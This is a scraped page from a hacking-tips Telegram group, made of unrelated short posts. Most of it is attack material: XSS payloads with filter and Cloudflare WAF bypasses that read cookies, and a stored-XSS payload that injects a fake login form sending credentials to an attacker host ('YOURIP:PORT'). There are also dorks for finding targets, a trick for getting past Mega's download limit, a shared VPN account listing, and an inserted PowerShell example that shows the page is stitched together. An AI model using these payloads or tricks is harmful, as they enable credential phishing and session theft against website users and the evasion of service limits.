Termux All Command [Telegram Group]
Hello, this is the Termux All Command official Telegram group. Here we share all kinds of resources. It is also a backup of the Facebook page.
Telegram Channel >> https://t.me/termuxcommandfull
Facebook Page >> https://www.facebook.com/termux.command.full
Bypass XSS Filter in File upload functionality "filename=" parameter
Transform Self XSS To Blind XSS
.
test
test
----- XSS Triggered --> True
----- Alert Cookie ----> False
----- File Submitted --> False
----- Blind XSS -------> False
test
test
----- XSS Triggered --> True
----- Alert Cookie ----> True
----- File Submitted --> False
----- Blind XSS -------> False
test
test.jpg
----- XSS Triggered --> True
----- Alert Cookie ----> True
----- File Submitted --> True
----- Blind XSS -------> False
test
>/xxxsssss.jpg';>test.jpg
----- XSS Triggered --> True
----- Alert Cookie ----> True
----- File Submitted --> True
----- Blind XSS -------> True
.
▪️How To Find Who Logged Into Your Computer And When?
—> Step 1: First of all, type “gpedit.msc” in the start menu and hit enter.
—> Step 2: Now browse to the following folder: Local Computer Policy –> Computer Configuration –> Windows Settings –> Security Settings –> Local Policies –> Audit Policy.
—> Step 3: Now you need to double click on Audit Logon event and then check “Success” and “Failure” and click on OK.
—> Step 4: Now you need to type “Event Viewer” on the start menu and hit enter.
—> Step 5: Now navigate to: Windows logs –> Security.
—> Step 6: Now you need to look for the events with event ID 4624 (4624 represents successful login events).
—> Step 7: You can double click on the events to know the time and some extra details about the login.
That’s it! You are done. This is the easiest way to track all the login attempts on your Windows computer.
Enjoy 👍❤️
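An added example, not part of the original post: the same check from an elevated PowerShell prompt instead of clicking through Event Viewer. It also lists event ID 4625 (failed logon), which the "Failure" box in Step 3 produces; the seven-day window and the logon-type filter are choices made for this example.

```powershell
# Added example. Run as administrator: reading the Security log requires it.

# Confirm the audit policy from Steps 1-3 is in effect
# (category name as shown on English-language Windows).
auditpol /get /category:"Logon/Logoff"

# 4624 = successful logon (Step 6); 4625 = failed logon.
$filter = @{ LogName = 'Security'; Id = 4624, 4625; StartTime = (Get-Date).AddDays(-7) }

# Common LogonType values recorded in these events.
$logonTypes = @{ 2 = 'Interactive'; 3 = 'Network'; 4 = 'Batch'; 5 = 'Service'
                 7 = 'Unlock'; 10 = 'RemoteInteractive'; 11 = 'CachedInteractive' }

Get-WinEvent -FilterHashtable $filter | ForEach-Object {
    # The named fields live in the event's XML payload, not in the formatted message.
    $data = @{}
    foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    $type = [int]$data['LogonType']
    [pscustomobject]@{
        Time      = $_.TimeCreated
        Result    = if ($_.Id -eq 4624) { 'Success' } else { 'Failure' }
        User      = '{0}\{1}' -f $data['TargetDomainName'], $data['TargetUserName']
        LogonType = if ($logonTypes.ContainsKey($type)) { $logonTypes[$type] } else { $type }
        SourceIp  = $data['IpAddress']
        Computer  = $data['WorkstationName']
    }
} |
    # Drop service and batch logons so human sign-ins stand out.
    Where-Object { $_.LogonType -notin 'Service', 'Batch' } |
    Sort-Object Time -Descending |
    Format-Table -AutoSize
```

Logon type 10 (RemoteInteractive) with an unfamiliar SourceIp, or a run of Failure rows followed by a Success for the same user, are the rows worth a closer look.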
▪️A simple visual explanation of HTTP Request methods.
These five are widely used: 👇🏻
GET
POST
PUT
PATCH
DELETE
Reflected XSS: 🤑
----------------
Steps:
--> Find origin ip using Google dork
--> Find search parameter
--> inject payload
--> B0oooM
Google dork:
---> (target.com) (site:*.*.29.* |site:*.*.28.* |site:*.*.27.* |site:*.*.26.* |site:*.*.25.* |site:*.*.24.* |site:*.*.23.* |site:*.*.22.* |site:*.*.21.* |site:*.*.20.* |site:*.*.19.* |site:*.*.18.* |site:*.*.17.* |site:*.*.16.* |site:*.*.15.* |site:*.*.14.* |site:*.*.13.* |site:*.*.12.* |site:*.*.11.* |site:*.*.10.* |site:*.*.9.* |site:*.*.8.* |site:*.*.7.* |site:*.*.6.* |site:*.*.5.* |site:*.*.4.* |site:*.*.3.* |site:*.*.2.* |site:*.*.1.* |site:*.*.0.*)
---> Payload: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss
'><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
How to Download From Mega Without Any Limit
You can easily bypass the Mega download limit of 5GB and Download as much content as you want.
Today I want to share with you a method to download from Mega.nz without limited bandwidth (normally its 5Gb/day).
Let’s dive into it!
👉 Step 1: Download the software MegaBasterd from Github: https://github.com/tonikelope/megabasterd
👉 Step 2: Take a free proxy from any proxy supplier that you have, I use a free proxy: https://proxyscrape.com/free-proxy-list
👉 Step 3: Install proxies to software: Copy all free proxies, go to Edit → Settings → Download → paste proxies like the photo below
XSS - CloudFlare WAF bypass 😋
Payload : <svg onload=alert(document.cookie)>
Critical misconfiguration in Firebase — Bug bounty : https://offsec01.medium.com/critical-misconfiguration-in-firebase-e682ec4239d6
XSS found -- works only on chrome
payload -->
For firefox -->
Welcome to Asperis Security's XSS Detection Tool! This tool is designed to help identify and validate Cross-Site Scripting (XSS) vulnerabilities through GET requests. With precision and flexibility, it allows security researchers, pentesters and bug bounty hunters to find and mitigate potential XSS issues.
https://github.com/Asperis-Security/xssFuzz
#XSS
💣Dorks I use to research bugs through thehackernews
site:thehackernews.com "unauthenticated"
site:thehackernews.com "vulnerability"
site:thehackernews.com "CVE-2024"
Companies List that are HIRING for 100% REMOTE.
1. Deltek - https://lnkd.in/dkSfGNbF
2. Confluent - https://lnkd.in/dNSTmUeH
3. Cengage Group - https://lnkd.in/gGkT6jRZ
4. Quest Software - https://lnkd.in/dkHSNGmM
5. Upstart - https://lnkd.in/dGR4DJ52
6. hims & hers - https://lnkd.in/gr_SdVdE
7. UserGems - https://lnkd.in/gXi3mNf6
8. Abnormal Security - https://lnkd.in/gn5M4VDF
9. Cash App - https://lnkd.in/gdp8yUm8
10. LogicGate - https://lnkd.in/gjgX27Bc
11. Faire - https://lnkd.in/gYRNr9VM
12. Renaissanc - https://lnkd.in/gesiM_Dw
13. Rec Room - https://lnkd.in/gErDuTNa
14. VGS - https://lnkd.in/g7Ajb77F
15. VAST Data - https://lnkd.in/gMUFt4y9
16. Sorcero - https://lnkd.in/gpmDTnH7
17. McGraw Hill - https://lnkd.in/g59pzFf4
18. Patreon - https://lnkd.in/gzQptMcQ
19. Beekeeper - https://lnkd.in/gxd7rs7Q
20. Upwork - https://lnkd.in/gt4HYmd6
21. DocuSign - https://lnkd.in/ggfUncZf
22. DealHub. io - https://lnkd.in/gyNED4yp
23. Census - https://lnkd.in/gAq7PGzc
24. Intrado - https://lnkd.in/gH3wuNWZ
25. Cloudflare - https://lnkd.in/g9JPXp2F
26. Funded. club - https://lnkd.in/gpH4FazA
27. Workiva - https://lnkd.in/g-FUYYdR
28. MissionWired - https://lnkd.in/gMA6AVdG
29. Workera - https://lnkd.in/g2YzZu-H
30. Jenius Bank - https://lnkd.in/gxGqHGkH
31. Goinstacare - https://lnkd.in/d6ZN5FVD
32. Uplers - https://www.uplers.com
33. Quantum - https://lnkd.in/d8jFCeuU
34. Canonical - https://lnkd.in/d9mf5Rr3
35. Kemecon - http://kemecon.com
36. Gitlab - https://lnkd.in/d2eGyKRv
37. DigitalOcean - https://lnkd.in/dYgDZ-WF
38. Atlassian - https://lnkd.in/dp-SFzfT
39. AngelOne - https://lnkd.in/dk3NwDn6
40. Shopify - https://lnkd.in/d9zpGKTy
41. Appcues - https://lnkd.in/dp2Jiupp
42. Arkency - https://lnkd.in/dBB_wZaR
43. Automattic - https://lnkd.in/ddSBdusv
44. Awesomemotive - https://lnkd.in/diZZjb4J
45. Buffer - https://lnkd.in/d7ihgxkA
46. Constructor - https://lnkd.in/daBzMdxM
47. Contra - https://contra.com/careers
48. Doist - https://doist.com/careers/
49. DuckDuckGo - https://lnkd.in/d_Kv9dM6
50. Bold - https://lnkd.in/dZQ8dQnq
51. Akamai Technologies - https://lnkd.in/dpTN5nPT
52. Cloudbeds - https://lnkd.in/dg3gC5v6
53. Mentorsity - https://lnkd.in/d8YyGHNH
54. Expert Thinking - https://lnkd.in/dz_4HFUi
55. iVisa - https://ivisa.breezy.hr/
56. Affordmate - http://www.affordmate.com
57. Xapobank - http://www.xapobank.com
58. Symetra - http://www.symetra.com
59. Docker, Inc - https://lnkd.in/gfX5-pQG
Avast Secureline Unlimited VPN
Exp: 31 Days
User: 100 Devices x 10
Cloudflare Bypass Payload
0</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.cookie)%20>
🪲How I stay updated with CVEs?
curl https://cvedb[.]shodan[.]io/cves | jq | grep "cve_id"
Pen-Andro - An automated script to Automate installation of Android pentest Apps, Frida server and moving Burp suite certificate to root folder. A useful Android pentesting tool!
» https://lnkd.in/gNyDXYZK
🚨Advancing Dorking Techniques day by day
#OSINT
Identify Malicious or Cloned Domains via IP Addresses by Google dorking.
(shopify.com) (site:*.*.255.* | site:*.*.254.* | site:*.*.253.* | site:*.*.252.* | site:*.*.251.* | site:*.*.250.* | site:*.*.249.* | site:*.*.248.* | site:*.*.247.* | site:*.*.246.* | site:*.*.245.* | site:*.*.244.* | site:*.*.243.* | site:*.*.242.* | site:*.*.241.* | site:*.*.240.*)
Breakdown:
• Searches for domains related to Shopify hosted or keyword embedded on specific IP address ranges.
• Helps identify potential malicious, cloned, or open dashboard domains.
• By focusing on higher IP ranges, you might uncover less secure or misconfigured hosts.
💣One of the difficult bugs to hunt for is
💡HTTP Request Smuggling
👇Medium articles to learn
[1] https://lnkd.in/g2F_CVT4
[2] https://lnkd.in/gW5bYxx2
[3] https://lnkd.in/gThRcny5
